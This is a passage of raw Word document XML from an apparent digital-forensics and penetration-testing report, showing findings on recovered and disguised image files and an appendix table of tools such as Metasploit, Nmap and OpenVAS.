            <wp:docPr id="1333634389" name="Picture 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4389" name="Picture 73"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814195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D32E6" w14:textId="77777777" w:rsidR="0064341C" w:rsidRDefault="0064341C" w:rsidP="00AB4471">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EA0FC4" w14:textId="77777777" w:rsidR="00AB4471" w:rsidRDefault="00AB4471" w:rsidP="00AB4471">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5A1F66" w14:textId="3B61ECE8" w:rsidR="00AB4471" w:rsidRPr="00AB4471" w:rsidRDefault="00AB4471" w:rsidP="00AB4471">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00363802">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="000C20EF" w:rsidRPr="00363802">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="00363802">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4471">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exported and validated hidden JPG files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64379F" w14:textId="7A46A689" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A"/>
    <w:p w14:paraId="7E9B4444" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00065C78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Analysis of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596EC40" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00065C78">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Technical Observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F21D5B" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recovered and validated:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Five images (Picture 1 – file1.jpg, Picture 2 – imapicture2, Picture 3 – file6.jpg, Picture 4 – file7.jpg, Picture 5 – inside file8.zip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CF830" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Suspicious file disguised as image:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> file3.jpg (contained ASCII text instead of image data, linked to obfuscation/steganography).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA11E5" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Invalid / corrupted:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> file4.jpg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D4A77" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Missing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> file2.jpg, file5.jpg, and file5 (searched without extension).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EB3FD" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Excluded:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pictures 6 and 7 from file9.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BB4F2" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00065C78">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Forensic Significance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53097F0E" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstrates concealment, deletion, and file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>mislabeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C1F71" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Confirms logical deletion does not erase physical remnants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F0659" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">File3.jpg highlights deliberate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>mislabeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> consistent with steganography/obfuscation tactics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A134511" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Shows Autopsy’s ability to locate and recover hidden files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004D9AFC" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00065C78">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Legal Relevance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F680D" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Integrity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verified through MD5 comparisons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67877E88" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Files uncovered via systematic forensic methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E1E64" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Five valid images extracted, plus suspicious disguised entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB0CD40" w14:textId="77777777" w:rsidR="00065C78" w:rsidRPr="00065C78" w:rsidRDefault="00065C78" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Transparency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00065C78">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Invalid, suspicious, and missing results documented for defensible forensic reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9656A7" w14:textId="77777777" w:rsidR="00065C78" w:rsidRDefault="00065C78" w:rsidP="28E2C82A"/>
    <w:p w14:paraId="325A951E" w14:textId="6B8B7883" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A"/>
    <w:p w14:paraId="3DEC8D99" w14:textId="098E613B" w:rsidR="47DF796B" w:rsidRDefault="47DF796B" w:rsidP="47DF796B"/>
    <w:p w14:paraId="0FAAF63E" w14:textId="6068DFB2" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc1718906709"/>
      <w:r>
        <w:t>APPENDIX A - TOOLS USED</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="2CB551BC" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>
        <w:tblW w:w="109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7530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00475B86" w14:paraId="75C11BD1" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3465" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="430D6F64" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>TOOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75771DDA" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>DESCRIPTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="407778D9" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C552939" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>BurpSuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Community Edition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A1B32C5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Used for </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>testing of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> web applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="43B2EDD2" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4263E909"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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DEFCDB2" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used for exploitation of vulnerable services and vulnerability scanning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="19421145" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="425A680E"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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2156C7F7" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used for scanning ports on hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="4ACAA764" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="169D42EF"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OpenVAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A1D8D83" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used to scan the networks for vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="49E42E78" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B848822"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PostgreSQL Client Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06677445" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used to connect to the PostgreSQL server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="593B7876" w14:textId="366184FC" w:rsidR="005B7152" w:rsidRDefault="00922DBC" w:rsidP="002012E9">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
